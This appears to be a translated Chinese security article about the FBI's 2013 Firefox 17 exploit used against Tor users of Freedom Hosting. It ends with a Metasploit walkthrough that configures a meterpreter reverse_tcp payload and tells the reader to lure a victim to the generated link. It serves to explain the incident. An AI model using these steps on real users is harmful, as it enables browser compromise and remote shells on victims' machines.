Tor网络是一种允许用户匿名访问网站和其他服务的网络。在这个网络中,存在一种称为黑暗网络(darknet)的服务,从论坛到电子邮件都有,这些服务是只有通过tor才可以访问。
Tor通过志愿者提供的3000多个中继传输网络流量从而隐藏真实用户的位置信息。尽管Tor网络上的很多服务都是清白的,但是它的匿名性也吸引了很多具有犯罪意图的人,比如传播儿童色情的组织。
出生于美国的Eric Eoin Marques居住在爱尔兰的都柏林,他是Freedom Hosting的首席架构师,而Freedom Hosting在欧洲的550台服务器被指控用来托管儿童色情网站。
Freedom Hosting就是Tor网络上的一个重要的服务提供商。它的服务只能通过tor网络来访问。因为它涉嫌违法的事情,所以Tor的负责人还特地发表过声明,称他们跟运营Freedom Hosting的人没有任何关系。声明如下:
“运营Freedom Hosting的人或组织跟开发Tor软件的团队没有任何关联和隶属关系。过去,曾有敌对的组织试图绕过tor隐藏的服务,直接攻击tor网络背后服务器上的软件。通常都是利用php,mysql和其他的软件的漏洞而不是tor本身的漏洞。最近有消息表明,有人成功利用了Freedom Hosting背后的软件漏洞。据我们所知是利用了Firefox 17 ESR的一个bug,tor浏览器就是基于这个firefox版本的。我们会研究这些bug,并尽快修复他们。
FBI利用了firefox17的一个漏洞,成功追踪到了Freedom Hosting的服务器。它使用的payload是收集电脑的MAC地址和hostname,然后通过http协议发送到自己控制的服务器上从而获得真实的ip地址。
Mozilla Firefox 小于22.0的版本,Firefox ESR 17.x,小于17.07的版本,Thunderbird ESR 17.x,小于17.07的版本没有妥善的处理onreadystatechange事件,导致远程攻击者可以拒绝服务攻击(程序crash)或者可能执行任意代码。
2013年8月份的时候就已经有人在利用这个漏洞攻击Tor browser的用户了。现在msf上已经有利用模块,针对firefox17.06.模块使用说明:
windows/browser/mozilla_firefox_onreadystatechange:
输入show options检查这个exp的配置项
SRVHOST是msf本机的地址,这里配置命令是set SRVHOST 192.168.0.3
然后设置payloadset PAYLOAD windows/meterpreter/reverse_tcp
输入show options查看payload的配置项
设置接受反弹shell的地址 set LHOST 192.168.0.103
输入run命令开始监听:
只要让受害者访问这个exp生成的链接就可以了.这里是http://192.168.0.103:8080/2Hek0bdO
如果对方的浏览器存在漏洞可以看到msf的输出如下:
参考资料:
http://rt.com/usa/fbi-exploiting-tor-child-porn-842/
http://siliconangle.com/blog/2013/08/06/darknet-freedom-hosting-sites-shutdown-led-by-fbi-exploit-use-against-tor-network/
http://thehackernews.com/2013/08/Firefox-Exploit-Tor-Network-child-pornography-Freedom-Hosting.html
http://www.rapid7.com/db/modules/exploit/windows/browser/mozilla_firefox_onreadystatechange
via http://resources.infosecinstitute.com 翻译整理by litdg@freebuf